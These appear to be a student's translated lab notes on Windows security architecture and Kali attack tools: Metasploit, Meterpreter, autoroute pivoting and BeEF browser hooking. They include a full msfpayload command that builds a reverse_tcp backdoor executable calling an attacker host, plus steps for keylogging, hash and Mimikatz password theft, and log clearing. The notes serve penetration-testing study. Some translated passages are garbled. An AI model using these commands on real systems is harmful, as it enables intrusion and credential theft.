learning material content
1. Windows operating system framework
1. Development and current situation of Windows operating system
Windows occupies a very high market share in desktop operating systems, and Windows XP system still has a large number of users in China
2. Basic structure of Windows operating system
(1) The basic module of the Windows operating system kernel
+Windows executable: the upper interface of the Windows kernel core file ntoskrnl.exe
+Windows kernel body: function implementation and hardware architecture support code in the Windows kernel core file ntoskrnl.exe to realize the underlying operating system functions
+ Device drivers: including hardware device drivers that map user I/O operations to specific hardware device I/O requests, as well as file system and network device drivers.
+Hardware abstraction layer: hal.dll file, the underlying code used to shield the differences between Windows kernel and platform hardware.
+Windows window and GUI interface kernel implementation code: win.32k.sys file
(2) The code module of Windows operating system in user mode
+ System support process: system built-in service process automatically started when Windows is started
+ Environment subsystem service process: a service process that provides support for the operating system operating environment
+Service process: a series of system and network services started through the service management mechanism of windows
+User application software: all kinds of user application software executed in user mode
+Core subsystem DLL: dynamic link library files such as kernel32.dll/user32.dll/gdi32.dll/avapi32.dll, as the interaction interface between the user mode service process and the application software and the operating system kernel, the user mode program calls System API functions are mapped to corresponding one or more Windows internal system service calls.
(3) Core mechanism
+Windows process and thread management mechanism
+Windows memory management mechanism
+Windows file management mechanism
+Windows registry management mechanism
+Windows network mechanism
①Network card hardware device driver, located in OSI physical layer
②NDIS library and miniport driver, located in OSI link layer
③TDI transport layer, network protocol driver, located in OSI network layer and transport layer ④Network
API DLL and TDI client, corresponding to OSI session Layer and presentation layer
⑥Network application and service process, corresponding to OSI application layer
2. Security Architecture and Mechanism of Windows Operating System
1. Windows Security Architecture
The Windows operating system implements the basic object security model based on the reference monitor model. All subjects in the system access objects through the reference monitor as an intermediary, and the reference monitor conducts authorized access according to the security access control policy, and all access records are also generated by the reference monitor to generate audit logs.
The Windows operating system implements the basic security mechanism, the core of which is the SRM security reference monitor located in the kernel, and the LSASS security service located in the user mode, which together with services such as Winlogon/Netlogon and Eventlog, realize the identity of the main user. Authentication mechanism, access control mechanism for all resource objects, and security audit mechanism for access.
2. Windows authentication mechanism
In the Windows operating system, the concept of security principal is used to include all the entity objects that request access to system resources, including users, user groups and computers. For each security principal, a globally unique SID security identifier in both time and space is used. to identify. The fundamental role of account permissions is to limit the access of programs running in these accounts to system resource objects.
There are some built-in accounts in the Windows system, such as the local Administrator account with the highest privileges, the SYSTEM/LocalSystem account that automatically runs the system process environment, the Guest anonymous access user with relatively few privileges, and the IUSR_Machinename IIS service anonymous network access account Wait. In the eyes of hackers, the local Administrator and SYSTEM accounts have the highest privileges and are the ultimate targets of their attacks.
The built-in user groups of the Windows system include: Administrators, the highest-level local user group, Account/Backup/Server/Print Operators and other operation groups with one-sided system authority, Network Service and Local Service user groups for accommodating service accounts, and The Users group where all user accounts are located, etc. The password of the Windows user account is encrypted and stored in the SAM or Active Directory AD. The local user account password information is encrypted with an irreversible 128-bit random key Hash and stored in the SAM file, and the SAM is stored in %systemroot%\ system32\config\sam file system path location, and has a copy in HKEY_LOCAL MACHINE\SAM in the registry.
The Windows domain account password information is stored in the Active Directory AD of the domain controller. The encryption method is the same as that of the stand-alone platform. The storage file system location is the %systemroot%\ntds\ntds.dit path of the domain controller.
Windows supports local authentication and network authentication, respectively, to verify the legitimacy of the main subjects who log in to the local system and access the remote network. The network authentication process is led by the Netlogon module of the LSASS service.
The Windows process, the GINA graphical login window, and the LSASS service cooperate to complete the local authentication process.
3. Windows authorization and access control mechanism
The Windows authorization and access control mechanism is based on the reference monitor model, which is implemented by the SRM module in the kernel and the LSASS service in user mode. In Windows server operating systems, users can execute the built-in whoami command to view the access token information of the current user. Windows abstracts all resources to be protected in the system into objects, the specific types include files, directories, registry keys, kernel objects, synchronization objects, private objects, pipes, memory, communication interfaces, etc., and each object will be associated with An SD security descriptor consisting of the following attributes:
+Owner SID
+Group SID
+DACL discretionary access control list
+SACL System Audit Access Control List
4. Windows security audit mechanism
The system audit policy is defined by the system administrator in the local security policy to determine which events are logged by the system.
5. Win identity authentication, authorization and access control, and security auditing are the three basic security functions. The three most critical security measures to protect the safe and stable operation of Windows systems - firewall, automatic patch update and virus protection. In addition to Security Center, Windows security features include IPSec encryption and authentication mechanism, EFS encrypted file system, Windows file protection mechanism, privacy protection and browsing security protection mechanism provided by the bundled IE browser, etc.
Other security mechanisms of dows
3. Windows remote security attack and defense technology
+ Remote password guessing and cracking attacks
+ Attack Windows Network Services
+ Attack Windows clients and users
1. Security vulnerability life cycle of Windows system
The essential core of system security lies in the offensive and defensive game and competition among security vulnerabilities, penetration attacks and security detection and defense mechanisms.
+Windows security vulnerability discovery, exploitation and patching process
+ Security Vulnerability Public Disclosure Repository
+ Penetration testing attack process for specific targets
①Vulnerability scanning test
②Find penetration code for discovered vulnerabilities
③Perform penetration test
Use Metasploit software to implement penetration testing: Metasploit software adopts an extensible model composed of development frameworks and modules, and the Metasploit Framework (MSF) library written in Ruby language is the basic core of the entire software, providing a platform for the development and testing of penetration testing components; modules The component is the code that actually implements the penetration attack, including the Exploits module that exploits security vulnerabilities, the Auxiliary module that performs scanning, enumeration and other auxiliary tasks, and the Shellcode attack payload Payloads module implanted and run on the target system to encode the attack payload. Encoders module to avoid detection, and Nops module to fill attack payload; Metasploit provides a variety of user interfaces, including Console interactive terminal, command line program running, Web interactive interface and GUI graphical interface; Metasploit also provides API interfaces and Plug-in support to support third-party development of extension modules based on MSF, such as automated penetration testing routines, etc.
2. Windows remote password guessing and cracking attacks
+ Remote password guessing
+ Remote password exchange communication eavesdropping and cracking
+Remote password guessing and cracking prevention measures
3. Windows network service remote penetration attack
Windows operating systems open ports 135 (TCP), 137 (UDP), 139 (TCP) and 445 (TCP) by default, and the corresponding network services are MSRPC and procedure call services, NetBIOS network basic input output system services and SMB file and printer sharing Serve.
+ Well-known vulnerabilities and attacks against NetBIOS network services
+ Well-known vulnerabilities and attacks against SMB web services
+ Well-known vulnerabilities and attacks against MSRPC web services
+ Remote penetration attack against Microsoft Network Services on Windows systems
+ Remote penetration attacks against third-party network services on Windows systems
+Prevention measures for remote penetration attack of network services
Four, Windows local security attack and defense technology
1. Windows local privilege escalation
Ultimate privilege: Administrator or Local System account. The attack technique of attempting to gain privileged accounts from restricted user rights is also known as privilege escalation.
2. Windows sensitive information theft
+Windows system password ciphertext extraction technology
+Windows system password cracking technology
+ User sensitive data theft
+ Local sensitive information theft prevention measures
3. Windows disappears
+ Turn off the audit function
+ Clean up event log
+Preventive measures against disappearance
4. Windows remote control and backdoor programs
+ Command line remote control tool
+ Graphical remote control tool
+ Preventive measures against backdoors
Reference
http://blog.sina.com.cn/s/blog_acdeaa0901017irl.html
video content learning
Since my own computer was used for maintenance, I borrowed someone else's computer to do this experiment.
KaliSecurity - Vulnerability Retrieval and Exploitation
Vulnerability Detection and Exploitation Tools
1. searchsploitl vulnerability retrieval tool, this project is a vulnerability search tool initiated by Offensive Security and based on the official vulnerability database source of exploit database. It can directly search for vulnerability-related information on the terminal, such as vulnerability profiles and vulnerability verification/exploitation scripts. list all files
All vulnerabilities and corresponding file addresses are listed
/usr/share/exploitdb/patforms/Enter the relative address corresponding to the vulnerability from the directory`
Instructions used: cat php/webapps/6.php
搜索windows上iis服务的远程漏洞:root@localhost:~# searchsploit windows iis remote
2.pattern creat
You can use this command when the buffer overflows. For example, pattern create 1000 a can output 1000 a
3. tie
A network vulnerability scanning tool can open a port and IP address. Once a vulnerable host scans it through this port, it will be attacked and a shellcode will be implanted. Waiting for the target to visit
4.Termineter is designed to evaluate the security of smart meters, Python Smart Meter Testing Framework.
Summary of Metasploit Basics of Vulnerability Exploitation
Metasploit is often used in penetration testing and contains many tools that form a complete attack framework.
To use metaaploie in Kali, you need to start the PostgreSQL database service and metasploit service first, and then you can fully use msf data to query exploits and records.
service postgresql start
service metasploit start
If you don't want to manually start the service every time you boot, you can configure it to start with the system.
update-rc.d postgresql enable
update-rc.d metasploit enableSecond, the path introduction
The path to msf in Kali is /usr/share/metasploit-framework
+Auxiliary: auxiliary module
+encoders: for msfencode encoding tools, you can use msfencode –l
+exploits: Every article introducing msf in the attack module will mention the ms08_067_netapi, which is in this directory.
+payloads: Listed are the attack payloads, that is, the code that is executed after the attack is successful. For example, windows/meterpreter/reverse_tcp that we often set is under this folder.
+post: Post-exploitation stage block, the attack code can be used after getting a shell of the meterpreter. For example, the commonly used hashdump and arp_scanner are here.
3. Basic commands
msfpayload: used to generate payload or shellcode
When searching, you can use msfpayload -l |grep "windows"this command to query. The -o option can list the parameters required by the payload
msfencode: The encoder in msf, in order to bypass AV in the early days, it is now commonly used to encode msfpayload with him to avoid bad strings of exploit.
msfconsole: The most commonly used command to open metasploit's console.
4. Test example: find vulnerabilities, search for exploits
In the early stage, the target 21 port vsftp service version passed through the scan is 2.3.4. Use msfconsole to open the command line version of msf, and search for vulnerabilities through the search statement.
No vulnerabilities were found in this version.
KaliSecurity - Introduction to Meterpreter for Vulnerability Exploitation
meterpreter is an extension module in the metasploit framework. It is used as an attack payload after the overflow is successful. The attack payload returns a control channel to us after the overflow is successful. Using it as an attack payload can get a meterpretershell of the target system.
There are many types of meterpreter as a post-penetration module, and the commands are composed of core commands and extended library commands, which greatly enriches the attack method. It has many useful functions, such as adding a user, hiding some things, opening a shell, and getting users. Password, upload and download the file of the remote host, run cmd.exe, capture the screen, get the remote control, capture the key information, clear the application, display the system information of the remote host, display the remote and its network interface and IP address and other information.
Common commands:
background: put the current session in the background
load/use: load the module
interact: switch to a channel
migrate: Migration process
run: Execute an existing module. What I want to say here is to press the tab twice after entering run, and all existing scripts will be listed.
Attack steps:
1. Generate Meterpreter backdoor: command:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.129.200 LPORT=2333 R | msfencode -t exe -c 5 > /root/door1.exe
The current IP address of kali is: 192.168.129.200
2. Open MSF, enable monitoring, and select exploit/multi/handler
make sure to open
3. Execute door.exe on the target machine
4. View executable commands through the help command
5. Use of common commands, including system information, capture screenshots and capture HASH, etc.
6. Directory browsing
7. Keyboard monitoring
8. Extension tools, enter help after load/use, you can see the description of the commands of this module
9. Minikatz of extension tools, grab the local password plaintext
KaliSecurity - Metasploit Post-Exploitation Penetration Testing
After the springboard obtains a certain authority, it needs to actively develop the authority of the intranet host, obtain the specified target information, and probe for system vulnerabilities. With the help of the Meterpreter backdoor that msf has obtained, the series of operations can be easier.
1. View the current network card and network segment information. ifconfig
2. Add routing table
run autoroute -s 10.0.0.1You can use the modules in msf to attack or scan across network segments. Quickly added via script autoroute.
3. Open socket proxy, create a socks proxy by using auxiliary/server/socks4a module, which can be used for browser, sqlmap, nmap. You can access intranet computers through a proxy.
4. You can freely switch to the session through background and session -i.
5. Enter run to see many commands that can be done on the meterpreter.
6. You can see the post penetration test module through run post/
7. Get intranet information run arp_acanner -h
8. You can also upload files and do port forwarding for subsequent testing.
BeeF Summary of Vulnerability Exploitation
Strong framework support is required for XSS vulnerabilities, such as online XSS platforms. Under Kali, BeeF is a tool that is not inferior to the XSS platform. Beef is the abbreviation of Browser Attack Framework, which is a penetration testing tool focused on the browser. Official website http://beefproject.com/
1. Start beef beef-xss from the command line. At this time, the browser automatically accesses this page: http://127.0.0.1:3000/ui/authentication Use the default user name beef and default password beef to log in:
left-targeted browsers
2. Suppose the host under test requests to http://192.168.129.200:3000/demos/basic.html due to XSS vulnerability
Access is denied, and then there is no success. . Also very helpless.
A new option appears in the online browsers on the left, and the Current Browser includes the browser name, version, operating system version, etc.
3. The duration of HOOK is until the test page is closed. During this period, it is equivalent to being controlled and can send attack commands. In the Commands module, we can complete many tasks:
Among them, the four colors represent:
+ This attack module is available, but it is very stealthy
+ The attack module is available, but it is poorly concealed
+The availability of this user module remains to be verified
+ this attack module is not available
+Select the Raw JavaScript module under MISC as a test case
Execute, view the returned result, if successful, display
4. Proxy function
Select the target host, right-click, and select Use as Proxy in the menu; then edit and send the content you want to send in the Forge Request in the Rider tab.